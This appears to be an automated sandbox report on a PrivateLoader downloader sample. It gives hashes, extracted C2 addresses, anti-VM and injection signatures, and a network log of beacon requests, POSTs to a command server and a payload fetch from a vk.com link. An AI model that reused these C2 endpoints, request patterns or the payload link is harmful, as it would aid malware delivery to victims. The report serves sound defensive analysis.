Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03/01/2023, 12:25 UTC

General

  • Target

    044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe

  • Size

    4.0MB

  • MD5

    3134fa9cea6fd7071133d85a5fb4f04e

  • SHA1

    bc8428fa442bc143aaa444e98dae698f440abc3e

  • SHA256

    044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9

  • SHA512

    e0d7e8f40bae193d484ef67342280c10c3223af3ebae7ae8285535435871e145e5a57c3e04944eb7d6df9688e7273e15066cb6748d26fd1015f4f820ae162be8

  • SSDEEP

    98304:706FB3Lep0AUPnz1GWObOOdbvUcPIPaatXQK2ApRE9Zea:7FL3Lk0AUPpGVbdbcyEtXWAzE9ka

Malware Config

Extracted

Family

privateloader

C2

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

208.67.104.60

Attributes
  • payload_url

Signatures

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe
    "C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:3796
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    1⤵
      PID:1464
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
      1⤵
        PID:1484

      Network

      • DNS
        metazone1.com
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        metazone1.com
        IN A
        Response
        metazone1.com
        IN A
        31.31.196.244
      • GET
        http://metazone1.com/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: metazone1.com
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:17 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • DNS
        meta-zone-1.ru
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        meta-zone-1.ru
        IN A
        Response
        meta-zone-1.ru
        IN A
        31.31.196.244
      • GET
        http://meta-zone-1.ru/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: meta-zone-1.ru
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:18 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • DNS
        meta-zone-1.online
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        meta-zone-1.online
        IN A
        Response
        meta-zone-1.online
        IN A
        31.31.196.244
      • GET
        http://meta-zone-1.online/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: meta-zone-1.online
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:18 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • GET
        http://208.67.104.60/api/tracemap.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:19 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 15
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:19 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        14 further POST requests to the same URL from InstallUtil.exe, with the same headers and User-Agent as the request above, differing only in Content-Length and timestamp: four more with Content-Length 413 and ten with Content-Length 133, dated Tue, 03 Jan 2023 12:26:20 to 12:26:23 GMT. Every one was answered with HTTP/1.1 200 OK, Content-Length 0, from Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29, with the Keep-Alive max counter stepping down from 98 to 85.
      • DNS
        ipinfo.io
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        ipinfo.io
        IN A
        Response
        ipinfo.io
        IN A
        34.117.59.81
      • GET
        https://ipinfo.io/widget
        InstallUtil.exe
        Remote address:
        34.117.59.81:443
        Request
        GET /widget HTTP/1.1
        Connection: Keep-Alive
        Referer: https://ipinfo.io/
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: ipinfo.io
        Response
        HTTP/1.1 200 OK
        access-control-allow-origin: *
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        x-content-type-options: nosniff
        referrer-policy: strict-origin-when-cross-origin
        content-type: application/json; charset=utf-8
        content-length: 912
        date: Tue, 03 Jan 2023 12:26:19 GMT
        x-envoy-upstream-service-time: 35
        strict-transport-security: max-age=2592000; includeSubDomains
        vary: Accept-Encoding
        Via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • DNS
        vk.com
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        vk.com
        IN A
        Response
        vk.com
        IN A
        87.240.137.164
        vk.com
        IN A
        87.240.129.133
        vk.com
        IN A
        87.240.132.72
        vk.com
        IN A
        87.240.132.67
        vk.com
        IN A
        87.240.132.78
        vk.com
        IN A
        93.186.225.194
      • GET
        https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
        InstallUtil.exe
        Remote address:
        87.240.137.164:443
        Request
        GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: vk.com
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: kittenx
        Date: Tue, 03 Jan 2023 12:26:22 GMT
        Content-Type: text/html; charset=windows-1251
        Content-Length: 139003
        Connection: keep-alive
        X-Powered-By: KPHP/7.4.113006
        Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
        Set-Cookie: remixlang=3; expires=Mon, 08 Jan 2024 19:52:31 GMT; path=/; domain=.vk.com
        Set-Cookie: remixstlid=9092856945242514274_TyUVALahm7RTRK4ZBUn3eTSSFWwg97pxXF61BoNGDZk; expires=Wed, 03 Jan 2024 12:26:22 GMT; path=/; domain=.vk.com; secure
        Set-Cookie: remixstid=1407836848_epszTabxfTZZLDQZzcDu9R70qzgke0rzJmmgiRIz0EH; expires=Sat, 06 Jan 2024 01:28:54 GMT; path=/; domain=.vk.com; secure
        Set-Cookie: remixlgck=e5ec174678d6eb2f90; expires=Sat, 06 Jan 2024 08:07:55 GMT; path=/; domain=.vk.com; secure; HttpOnly
        Cache-control: no-store
        X-Robots-Tag: noindex,nofollow
        Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp
        X-XSS-Protection: 1; report=/xss_reports
        X-Frame-Options: deny
        X-Frontend: front605107
        Strict-Transport-Security: max-age=15768000
        Access-Control-Expose-Headers: X-Frontend
      • 209.197.3.8:80
        322 B
        7
      • 31.31.196.244:80
        http://metazone1.com/api/tracemap.php
        http
        InstallUtil.exe
        3.8kB
        207.7kB
        79
        151

        HTTP Request

        GET http://metazone1.com/api/tracemap.php

        HTTP Response

        403
      • 31.31.196.244:80
        http://meta-zone-1.ru/api/tracemap.php
        http
        InstallUtil.exe
        3.8kB
        207.7kB
        79
        151

        HTTP Request

        GET http://meta-zone-1.ru/api/tracemap.php

        HTTP Response

        403
      • 31.31.196.244:80
        http://meta-zone-1.online/api/tracemap.php
        http
        InstallUtil.exe
        3.9kB
        208.0kB
        80
        152

        HTTP Request

        GET http://meta-zone-1.online/api/tracemap.php

        HTTP Response

        403
      • 208.67.104.60:80
        http://208.67.104.60/api/firegate.php
        http
        InstallUtil.exe
        9.9kB
        5.4kB
        49
        32

        HTTP Request

        GET http://208.67.104.60/api/tracemap.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200
      • 34.117.59.81:443
        https://ipinfo.io/widget
        tls, http
        InstallUtil.exe
        923 B
        6.8kB
        9
        10

        HTTP Request

        GET https://ipinfo.io/widget

        HTTP Response

        200
      • 87.240.137.164:80
        vk.com
        tls
        InstallUtil.exe
        449 B
        553 B
        6
        5
      • 87.240.137.164:80
        vk.com
        tls
        InstallUtil.exe
        395 B
        553 B
        6
        5
      • 87.240.137.164:80
        vk.com
        InstallUtil.exe
        190 B
        92 B
        4
        2
      • 87.240.137.164:443
        https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
        tls, http
        InstallUtil.exe
        5.9kB
        150.1kB
        115
        113

        HTTP Request

        GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1

        HTTP Response

        200
      • 20.189.173.14:443
        322 B
        7
      • 93.184.221.240:80
        322 B
        7
      • 93.184.221.240:80
        322 B
        7
      • 8.8.8.8:53
        metazone1.com
        dns
        InstallUtil.exe
        59 B
        75 B
        1
        1

        DNS Request

        metazone1.com

        DNS Response

        31.31.196.244

      • 224.0.0.251:5353
        158 B
        2
      • 8.8.8.8:53
        meta-zone-1.ru
        dns
        InstallUtil.exe
        60 B
        76 B
        1
        1

        DNS Request

        meta-zone-1.ru

        DNS Response

        31.31.196.244

      • 8.8.8.8:53
        meta-zone-1.online
        dns
        InstallUtil.exe
        64 B
        80 B
        1
        1

        DNS Request

        meta-zone-1.online

        DNS Response

        31.31.196.244

      • 8.8.8.8:53
        ipinfo.io
        dns
        InstallUtil.exe
        55 B
        71 B
        1
        1

        DNS Request

        ipinfo.io

        DNS Response

        34.117.59.81

      • 8.8.8.8:53
        vk.com
        dns
        InstallUtil.exe
        52 B
        148 B
        1
        1

        DNS Request

        vk.com

        DNS Response

        87.240.137.164
        87.240.129.133
        87.240.132.72
        87.240.132.67
        87.240.132.78
        93.186.225.194


      Downloads

      • memory/1376-144-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp (Filesize: 2.0MB)
      • memory/1376-143-0x0000000000A50000-0x0000000001612000-memory.dmp (Filesize: 11.8MB)
      • memory/1376-135-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp (Filesize: 2.0MB)
      • memory/1376-136-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp (Filesize: 10.8MB)
      • memory/1376-137-0x0000000000A50000-0x0000000001612000-memory.dmp (Filesize: 11.8MB)
      • memory/1376-138-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp (Filesize: 2.0MB)
      • memory/1376-134-0x0000000000A50000-0x0000000001612000-memory.dmp (Filesize: 11.8MB)
      • memory/1376-146-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp (Filesize: 10.8MB)
      • memory/1376-132-0x0000000000A50000-0x0000000001612000-memory.dmp (Filesize: 11.8MB)
      • memory/1376-139-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp (Filesize: 10.8MB)
      • memory/3796-140-0x0000000000400000-0x0000000000655000-memory.dmp (Filesize: 2.3MB)
      • memory/3796-145-0x0000000000400000-0x0000000000655000-memory.dmp (Filesize: 2.3MB)
      • memory/3796-142-0x0000000000400000-0x0000000000655000-memory.dmp (Filesize: 2.3MB)
      • memory/3796-147-0x0000000000400000-0x0000000000655000-memory.dmp (Filesize: 2.3MB)
      • memory/3796-148-0x0000000000400000-0x0000000000655000-memory.dmp (Filesize: 2.3MB)
